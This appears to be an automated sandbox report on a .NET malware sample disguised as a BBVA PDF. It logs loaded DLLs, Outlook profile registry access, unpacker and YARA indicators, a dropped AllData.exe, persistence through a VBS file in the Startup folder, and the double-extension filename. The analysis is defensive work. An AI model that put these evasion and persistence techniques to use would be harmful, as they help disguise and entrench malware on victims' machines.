            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\AllData.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msvbvm60.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsqlite3.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cdosys.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: inetcomm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msoert2.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: inetres.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: activeds.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: adsldpc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: logoncli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Jump to behavior
            Source: BBVA-P53269 .pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: BBVA-P53269 .pdf.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: W.pdb4 source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3746600843.0000000000401000.00000040.00000400.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp

            Data Obfuscation

            barindex
            .NET source code contains potential unpacker
            Source: BBVA-P53269 .pdf.exe, AutomatedDecorator.cs.Net Code: CloseDecorator System.AppDomain.Load(byte[])
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
            Source: 4.2.BBVA-P53269 .pdf.exe.6e90000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, ListDecorator.cs.Net Code: Read
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
            Source: 4.2.BBVA-P53269 .pdf.exe.6840000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
            Source: 4.2.BBVA-P53269 .pdf.exe.43cd9f8.1.raw.unpack, AutomatedDecorator.cs.Net Code: CloseDecorator System.AppDomain.Load(byte[])
            Yara detected Costura Assembly Loader
            Source: Yara matchFile source: 4.2.BBVA-P53269 .pdf.exe.65f0000.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.BBVA-P53269 .pdf.exe.65f0000.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000004.00000002.1333737955.0000000004281000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1338063941.00000000065F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1314628182.00000000030F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1448506731.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BBVA-P53269 .pdf.exe PID: 7844, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: AllData.exe PID: 7936, type: MEMORYSTR
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F264B7 pushfd ; iretd 4_2_06F264C1
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeCode function: 4_2_06F270FF push esp; ret 4_2_06F27109
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0042C4DC pushfd ; retf 0042h6_2_0042C4DD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 6_2_0042C9F9 push ss; iretd 6_2_0042C9FF
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_062764B7 pushfd ; iretd 9_2_062764C1
            Source: C:\Users\user\AppData\Roaming\AllData.exeCode function: 9_2_062770FF push esp; ret 9_2_06277109
            Source: 4.2.BBVA-P53269 .pdf.exe.61d0000.4.raw.unpack, pRy1ABjF7TXOJ1mHqjD.csHigh entropy of concatenated method names: 'rkyjspwPpA', 'pAEj1JuRTX', 'etIjNDsglZ', 'ouEj94NIlO', 'bmwjqwhk7D', 'HdUjnWTgh9', 'rUwjOotGJL', 'gp8jkkcV4K', 'AnAjIOypVo', 'Uilj2APBTp'
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile created: C:\Users\user\AppData\Roaming\AllData.exeJump to dropped file

            Boot Survival

            barindex
            Drops VBS files to the startup folder
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbsJump to dropped file
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbsJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbsJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses an obfuscated file name to hide its real file extension (double extension)
            Source: Possible double extension: pdf.exeStatic PE information: BBVA-P53269 .pdf.exe
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BBVA-P53269 .pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
